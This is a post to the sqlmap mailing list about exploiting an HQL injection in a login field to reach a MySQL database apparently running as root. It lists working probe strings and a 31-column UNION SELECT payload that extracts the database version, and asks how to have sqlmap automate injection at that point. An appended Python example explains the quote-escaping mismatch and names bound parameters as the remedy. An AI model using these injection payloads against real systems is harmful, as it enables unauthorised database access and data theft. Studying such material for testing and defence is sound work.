I've just found an instance of Hibernate Query Language injection that lets
me get at an underlying MySQL database if I inject in the right way. Some
examples I've got are:

loginName=a - works and gives 200
loginName=' - fails with HQL error and 500
loginName=a' or 'a'='a - works and gives 200
loginName=a\'' - gets through HQL and then generates a MySQL error in a
where clause. The injection gets converted to where NAME='a\'''

With some playing I've found that this is a valid injection and they are
running as root, as I get a 500 back when I supply root and a 200 when I give
something else.

loginName=a' and 'a\''="a" union select
@@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01"
from users where user()="root@localhost" -- '='1

The 500 is because some of the stuff from the union isn't being handled
correctly by the page; the 200 is because the union doesn't return any data,
so the first bit (basically a=a) is returning valid data and getting through
the rest of the parsing.

So I think what I need to do is to tell SQLMap that it is a union injection
with 31 fields and that the injection needs to go into here:

loginName=a' and 'a\''="a" <INJECT> -- '='1

Can I do this?

I've got all this set up and running in Burp so I can test things out if
anyone needs me to.

Robin
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
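As an added illustration (not part of the original post or of sqlmap) of why the a\'' probe above passes the HQL parser but breaks in MySQL, here are two deliberately simplified string-literal scanners modelling the two quoting rules involved: HQL/standard SQL only recognise '' as an escaped quote, while MySQL (with backslash escapes on) also recognises \'. The build_where helper is a constructed stand-in for the vulnerable concatenation behind the loginName field.

```python
# Added example, not from the original post: model the quote-escaping
# rules that make `a\''` balanced for HQL but unbalanced for MySQL.
# Only single-quote handling is modelled; this is not a SQL parser.

def literal_balanced(fragment: str, backslash_escapes: bool) -> bool:
    """Return True if every single-quoted literal in `fragment` is closed."""
    i, n, in_literal = 0, len(fragment), False
    while i < n:
        ch = fragment[i]
        if not in_literal:
            if ch == "'":
                in_literal = True
        else:
            if backslash_escapes and ch == "\\" and i + 1 < n:
                i += 2          # MySQL: \x is an escape inside a literal
                continue
            if ch == "'":
                if i + 1 < n and fragment[i + 1] == "'":
                    i += 2      # '' is an escaped quote in both dialects
                    continue
                in_literal = False
        i += 1
    return not in_literal


def hql_accepts(where_clause: str) -> bool:
    # HQL/standard SQL: only '' escapes a quote, backslash is ordinary.
    return literal_balanced(where_clause, backslash_escapes=False)


def mysql_accepts(where_clause: str) -> bool:
    # MySQL with default backslash escaping: '' and \' both escape a quote.
    return literal_balanced(where_clause, backslash_escapes=True)


def build_where(login_name: str) -> str:
    # Constructed stand-in for the vulnerable string concatenation; the
    # remedy is a bound parameter (e.g. "where NAME = :n" with setParameter),
    # which never passes user input through either quoting layer.
    return "where NAME='" + login_name + "'"


if __name__ == "__main__":
    # The four probes quoted in the post, as constructed sample input.
    for value in ["a", "'", "a' or 'a'='a", "a\\''"]:
        clause = build_where(value)
        print(f"{clause!r:28} HQL={hql_accepts(clause)} MySQL={mysql_accepts(clause)}")
```

Only the last probe diverges (HQL balanced, MySQL not), which matches the 200-then-MySQL-error behaviour described in the post and shows why escaping-based filtering tuned to one dialect is not a fix.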